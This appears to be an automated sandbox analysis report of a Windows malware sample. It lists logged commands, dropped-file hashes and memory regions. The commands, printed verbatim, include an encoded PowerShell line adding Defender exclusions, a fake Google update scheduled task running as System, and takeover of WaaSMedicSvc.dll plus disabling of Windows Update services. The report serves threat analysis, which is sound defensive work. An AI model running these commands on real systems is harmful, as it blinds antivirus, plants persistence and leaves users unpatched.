C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHkAegAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAawBrAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAZABkACMAPgA="1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exesc stop UsoSvc1⤵
-
C:\Windows\system32\sc.exesc config bits start= disabled1⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"1⤵
- Creates scheduled task(s)
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q1⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll1⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""1⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled1⤵
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""1⤵
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled1⤵
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE1⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f1⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f1⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f1⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f1⤵
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f1⤵
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f1⤵
-
C:\Windows\system32\sc.exesc config dosvc start= disabled1⤵
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""1⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""1⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled1⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc1⤵
-
C:\Windows\system32\sc.exesc stop dosvc1⤵
-
C:\Windows\system32\sc.exesc stop bits1⤵
-
C:\Windows\system32\sc.exesc stop wuauserv1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9947.tmp.csvFilesize
31KB
MD5179631a7ec94bb2e344cac984d5ee741
SHA1498c085e3e78ac71fa196d1791e12a3750a1c134
SHA256bcfe1e244d337ab7bf6d19a5885efff52847872ae8a923321e9adfad392a40a9
SHA51205294476479ddc7aab51dc8eaa37b009dfe5bb51426e2b27ec99ffda2ef5ecfc99f0f15b7c8c2f8dfa3c4a6018a196742fcbfd910537a4e9d3bcdf1ae5b4bfec
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9958.tmp.txtFilesize
12KB
MD5edaea4791e784d4eab4eb33638c646c3
SHA1673273ca6043152e869931f5d006db7078e5eb8f
SHA256aa36d307d78267d9b66bc39327e94563e7f92dd02c4e8c0373bd789bcf2c6aac
SHA512afd5520d5b9e2b5f0c91d9ff11a6675a9c55095f83681623a742e4ccd30cd64fe6fe42252100fde8ea6584027c70205f6a4423e0940c14dd2a9414882c576e2b
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C66.tmp.csvFilesize
30KB
MD5e8e1d2c75a9808ea84250e4e21d71f53
SHA119e9a5412ad6985706ab6ccb3957420f9079be4d
SHA2568bcc0a67b65b40c306ee1f75d3886ae35faf2bd2293dbe3b4337ef5bc6e438ba
SHA512483e6a4a140e402bb7e7ddd539906915c9ac5ac9bc9cb0dc5f2e22ac573e4f58bd412b6eeefd2a80ea97adec355ddf008596e8f737f00d8a1b4589d7ddf7b536
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C76.tmp.txtFilesize
12KB
MD517fa5e41d412b1731b5610acc9d5702b
SHA171e2aaf916cfd1bbbf5b7ef3250e325f8a400390
SHA25682dcb86e62f65d764eb1e4fbb6a2a42726eb89d55586aef6dcb060f547216eaa
SHA512880cf1ab3aa30c97e4c4c08bbd1adbb92beaaed1f62afda6a036c4ce315e69de461acbf3756cdeba6e0a704ca422cbddc4491f4b5f223cd4513c1ec6cbf0dc53
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logFilesize
539B
MD5f45d46b20b2f149cd2cfba6b1bd00f5f
SHA15e98894e4fdba7142eeb7c6634d5eeb110acb594
SHA256457a1ba49a120abd7d7ff591e0c9cd4e68fbe5fd6bfb0c7a57a909885bf631cd
SHA51288739f65b1dd634b6e0ec6f7183951d5b67ed2be23fefeef408b69a5b2c73116c4102daa9f19ef5fab1e2dcccec8869cf87f5b0dc525646fce9103743325b68c
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD56e0fe67a6719d0257126a10ca47e264f
SHA12af2d3a7a7557ef0dbc8276fddbcc706f8e1bee6
SHA256840dbc82beaee162ba1d947e011340e77e72117f255018488f675f4d9ef031b6
SHA512026502fa6b5d633623f20015f8164b3d409e67b1d0554c40d58eac1ee8fe7d52e9b22d069a84aaf2b5cbc20062d78e118c22738be96fa62c40f9c06aee9a7ab0
-
C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exeFilesize
2.2MB
MD540caa9b00badca24594571e157a6d2a9
SHA142f2faf2aa59f38c16824eaa1dc022fddb142565
SHA2567b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442
SHA512e8517ff311d81efe14707629f1730ca329db66b92d17ff711945ec5a0313de3cc914d59fd621bfcb907750b0947778784da191c0c6d703c92f788e61dc5e34d3
-
C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exeFilesize
2.2MB
MD540caa9b00badca24594571e157a6d2a9
SHA142f2faf2aa59f38c16824eaa1dc022fddb142565
SHA2567b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442
SHA512e8517ff311d81efe14707629f1730ca329db66b92d17ff711945ec5a0313de3cc914d59fd621bfcb907750b0947778784da191c0c6d703c92f788e61dc5e34d3
-
memory/68-201-0x0000000000000000-mapping.dmp
-
memory/96-222-0x0000000000000000-mapping.dmp
-
memory/352-325-0x000001BE8FE90000-0x000001BE8FEBA000-memory.dmpFilesize
168KB
-
memory/352-264-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/356-302-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/368-326-0x00000165BF1D0000-0x00000165BF1FA000-memory.dmpFilesize
168KB
-
memory/368-265-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/488-221-0x0000000000000000-mapping.dmp
-
memory/516-176-0x0000000000000000-mapping.dmp
-
memory/528-187-0x0000000000000000-mapping.dmp
-
memory/588-252-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/588-257-0x000002538B060000-0x000002538B08A000-memory.dmpFilesize
168KB
-
memory/588-254-0x000002538B030000-0x000002538B053000-memory.dmpFilesize
140KB
-
memory/596-303-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/600-220-0x0000000000000000-mapping.dmp
-
memory/624-266-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/624-327-0x0000026152D00000-0x0000026152D2A000-memory.dmpFilesize
168KB
-
memory/640-258-0x0000025807130000-0x000002580715A000-memory.dmpFilesize
168KB
-
memory/640-253-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/752-308-0x00000128C29D0000-0x00000128C29FA000-memory.dmpFilesize
168KB
-
memory/752-262-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/872-182-0x0000000000000000-mapping.dmp
-
memory/880-338-0x000002146B2C0000-0x000002146B2EA000-memory.dmpFilesize
168KB
-
memory/880-267-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/912-263-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/912-314-0x0000027D5EB00000-0x0000027D5EB2A000-memory.dmpFilesize
168KB
-
memory/928-219-0x0000000000000000-mapping.dmp
-
memory/1000-260-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/1000-306-0x000001BB9F5B0000-0x000001BB9F5DA000-memory.dmpFilesize
168KB
-
memory/1080-478-0x0000000000000000-mapping.dmp
-
memory/1116-339-0x0000025102480000-0x00000251024AA000-memory.dmpFilesize
168KB
-
memory/1116-268-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/1144-340-0x0000013ADFA00000-0x0000013ADFA2A000-memory.dmpFilesize
168KB
-
memory/1144-269-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/1184-232-0x0000000000000000-mapping.dmp
-
memory/1204-270-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/1204-343-0x0000015D51190000-0x0000015D511BA000-memory.dmpFilesize
168KB
-
memory/1212-344-0x000001B3813A0000-0x000001B3813CA000-memory.dmpFilesize
168KB
-
memory/1212-271-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/1268-177-0x0000000000000000-mapping.dmp
-
memory/1276-360-0x0000019AFAD70000-0x0000019AFAD9A000-memory.dmpFilesize
168KB
-
memory/1276-287-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/1284-345-0x0000018D1A560000-0x0000018D1A58A000-memory.dmpFilesize
168KB
-
memory/1284-272-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/1360-346-0x000001DB224C0000-0x000001DB224EA000-memory.dmpFilesize
168KB
-
memory/1360-273-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/1372-202-0x0000000000000000-mapping.dmp
-
memory/1392-348-0x0000028116EC0000-0x0000028116EEA000-memory.dmpFilesize
168KB
-
memory/1392-275-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/1424-347-0x00000221AF0A0000-0x00000221AF0CA000-memory.dmpFilesize
168KB
-
memory/1424-274-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/1436-227-0x0000000000000000-mapping.dmp
-
memory/1448-349-0x000001C20CAC0000-0x000001C20CAEA000-memory.dmpFilesize
168KB
-
memory/1448-276-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/1456-350-0x0000020A7C4C0000-0x0000020A7C4EA000-memory.dmpFilesize
168KB
-
memory/1456-277-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/1540-305-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/1548-351-0x000002BDB5890000-0x000002BDB58BA000-memory.dmpFilesize
168KB
-
memory/1548-278-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/1604-279-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/1604-352-0x000001763F490000-0x000001763F4BA000-memory.dmpFilesize
168KB
-
memory/1612-353-0x000001A2BB9C0000-0x000001A2BB9EA000-memory.dmpFilesize
168KB
-
memory/1612-280-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/1624-471-0x0000000000000000-mapping.dmp
-
memory/1636-178-0x0000000000000000-mapping.dmp
-
memory/1720-282-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/1720-355-0x000001C076800000-0x000001C07682A000-memory.dmpFilesize
168KB
-
memory/1728-281-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/1728-354-0x000001F86D600000-0x000001F86D62A000-memory.dmpFilesize
168KB
-
memory/1752-283-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/1752-356-0x0000024214CA0000-0x0000024214CCA000-memory.dmpFilesize
168KB
-
memory/1768-284-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/1768-357-0x000001D7AFE70000-0x000001D7AFE9A000-memory.dmpFilesize
168KB
-
memory/1784-129-0x0000000000000000-mapping.dmp
-
memory/1784-467-0x0000000000000000-mapping.dmp
-
memory/1852-285-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/1852-358-0x000001FCE5CE0000-0x000001FCE5D0A000-memory.dmpFilesize
168KB
-
memory/1936-138-0x0000017663F80000-0x0000017663FF6000-memory.dmpFilesize
472KB
-
memory/1936-135-0x0000017663DD0000-0x0000017663DF2000-memory.dmpFilesize
136KB
-
memory/1936-130-0x0000000000000000-mapping.dmp
-
memory/2000-286-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/2000-359-0x0000000001130000-0x000000000115A000-memory.dmpFilesize
168KB
-
memory/2136-288-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/2136-361-0x0000027873780000-0x00000278737AA000-memory.dmpFilesize
168KB
-
memory/2152-261-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/2152-307-0x0000000000860000-0x000000000088A000-memory.dmpFilesize
168KB
-
memory/2188-218-0x0000000000000000-mapping.dmp
-
memory/2208-174-0x0000000000000000-mapping.dmp
-
memory/2212-461-0x0000000000000000-mapping.dmp
-
memory/2308-167-0x0000000000000000-mapping.dmp
-
memory/2348-289-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/2356-290-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/2376-291-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/2388-198-0x0000000000000000-mapping.dmp
-
memory/2392-179-0x0000000000000000-mapping.dmp
-
memory/2416-197-0x0000000000000000-mapping.dmp
-
memory/2464-293-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/2476-292-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/2488-233-0x0000000000000000-mapping.dmp
-
memory/2488-464-0x0000000000000000-mapping.dmp
-
memory/2548-192-0x0000000000000000-mapping.dmp
-
memory/2552-294-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/2584-295-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/2596-123-0x000001D175DC0000-0x000001D175FE4000-memory.dmpFilesize
2.1MB
-
memory/2596-180-0x000001D175FE0000-0x000001D175FE6000-memory.dmpFilesize
24KB
-
memory/2596-175-0x000001D175D90000-0x000001D175DA2000-memory.dmpFilesize
72KB
-
memory/2596-120-0x000001D176000000-0x000001D17623C000-memory.dmpFilesize
2.2MB
-
memory/2596-322-0x000001D176800000-0x000001D17682A000-memory.dmpFilesize
168KB
-
memory/2596-122-0x000001D173500000-0x000001D17373B000-memory.dmpFilesize
2.2MB
-
memory/2596-483-0x0000000000000000-mapping.dmp
-
memory/2600-297-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/2648-296-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/2664-298-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/2680-299-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/2688-251-0x00007FFE42FE0000-0x00007FFE431BB000-memory.dmpFilesize
1.9MB
-
memory/2688-247-0x00007FFE42FE0000-0x00007FFE431BB000-memory.dmpFilesize
1.9MB
-
memory/2688-241-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/2688-243-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/2688-242-0x00000001400024C8-mapping.dmp
-
memory/2688-249-0x00007FFE40540000-0x00007FFE405EE000-memory.dmpFilesize
696KB
-
memory/2688-244-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/2688-250-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/2696-457-0x0000000000000000-mapping.dmp
-
memory/2712-166-0x0000000000000000-mapping.dmp
-
memory/2720-195-0x0000000000000000-mapping.dmp
-
memory/2728-300-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/2756-191-0x0000000000000000-mapping.dmp
-
memory/2780-189-0x0000000000000000-mapping.dmp
-
memory/2780-224-0x0000000000000000-mapping.dmp
-
memory/2784-226-0x0000000000000000-mapping.dmp
-
memory/2936-223-0x0000000000000000-mapping.dmp
-
memory/3156-196-0x0000000000000000-mapping.dmp
-
memory/3192-460-0x0000000000000000-mapping.dmp
-
memory/3340-246-0x00007FFE42FE0000-0x00007FFE431BB000-memory.dmpFilesize
1.9MB
-
memory/3340-240-0x00007FFE40540000-0x00007FFE405EE000-memory.dmpFilesize
696KB
-
memory/3340-248-0x00007FFE40540000-0x00007FFE405EE000-memory.dmpFilesize
696KB
-
memory/3340-237-0x000001986CFC0000-0x000001986CFFC000-memory.dmpFilesize
240KB
-
memory/3340-238-0x00007FFE42FE0000-0x00007FFE431BB000-memory.dmpFilesize
1.9MB
-
memory/3388-203-0x0000000000000000-mapping.dmp
-
memory/3480-301-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/3544-304-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/3700-194-0x0000000000000000-mapping.dmp
-
memory/3720-231-0x0000000000000000-mapping.dmp
-
memory/3724-217-0x0000000000000000-mapping.dmp
-
memory/3736-188-0x0000000000000000-mapping.dmp
-
memory/3764-239-0x0000000006E20000-0x0000000007170000-memory.dmpFilesize
3.3MB
-
memory/3764-256-0x0000000007250000-0x000000000726C000-memory.dmpFilesize
112KB
-
memory/3764-259-0x00000000072F0000-0x000000000733B000-memory.dmpFilesize
300KB
-
memory/3764-225-0x00000000066E0000-0x0000000006D08000-memory.dmpFilesize
6.2MB
-
memory/3764-235-0x0000000006650000-0x00000000066B6000-memory.dmpFilesize
408KB
-
memory/3764-214-0x0000000003A40000-0x0000000003A76000-memory.dmpFilesize
216KB
-
memory/3764-236-0x0000000006570000-0x00000000065D6000-memory.dmpFilesize
408KB
-
memory/3764-234-0x00000000063D0000-0x00000000063F2000-memory.dmpFilesize
136KB
-
memory/3764-313-0x00000000075A0000-0x0000000007616000-memory.dmpFilesize
472KB
-
memory/3880-190-0x0000000000000000-mapping.dmp
-
memory/3940-193-0x0000000000000000-mapping.dmp
-
memory/3960-200-0x0000000000000000-mapping.dmp
-
memory/4000-186-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/4000-185-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/4000-183-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/4000-184-0x0000000140002348-mapping.dmp
-
memory/4000-199-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/4076-181-0x0000000000000000-mapping.dmp
-
memory/4092-508-0x0000000000000000-mapping.dmp
-
memory/4108-465-0x0000000000000000-mapping.dmp
-
memory/4152-490-0x0000000000401BEA-mapping.dmp
-
memory/4192-312-0x0000013C5F870000-0x0000013C5F89A000-memory.dmpFilesize
168KB
-
memory/4192-309-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/4224-328-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/4224-311-0x0000000000000000-mapping.dmp
-
memory/4224-332-0x0000027C55FB0000-0x0000027C55FDA000-memory.dmpFilesize
168KB
-
memory/4224-329-0x0000027C55D50000-0x0000027C55D7A000-memory.dmpFilesize
168KB
-
memory/4264-317-0x0000015C72BD0000-0x0000015C72BFA000-memory.dmpFilesize
168KB
-
memory/4264-315-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/4288-324-0x00000245EDCF0000-0x00000245EDD1A000-memory.dmpFilesize
168KB
-
memory/4288-316-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/4288-310-0x0000000000000000-mapping.dmp
-
memory/4308-495-0x0000000000000000-mapping.dmp
-
memory/4328-320-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/4328-319-0x0000000000000000-mapping.dmp
-
memory/4328-323-0x0000020AF1E10000-0x0000020AF1E3A000-memory.dmpFilesize
168KB
-
memory/4328-321-0x0000020AF05A0000-0x0000020AF05CA000-memory.dmpFilesize
168KB
-
memory/4460-335-0x0000000000840000-0x000000000086A000-memory.dmpFilesize
168KB
-
memory/4460-333-0x0000000000000000-mapping.dmp
-
memory/4460-334-0x0000000000880000-0x00000000008AA000-memory.dmpFilesize
168KB
-
memory/4472-492-0x0000000000000000-mapping.dmp
-
memory/4500-511-0x0000000000000000-mapping.dmp
-
memory/4652-516-0x0000000000000000-mapping.dmp
-
memory/4692-520-0x0000000000000000-mapping.dmp
-
memory/4840-402-0x00007FFE03070000-0x00007FFE03080000-memory.dmpFilesize
64KB
-
memory/4972-413-0x0000000000000000-mapping.dmp
-
memory/5048-415-0x0000000000000000-mapping.dmp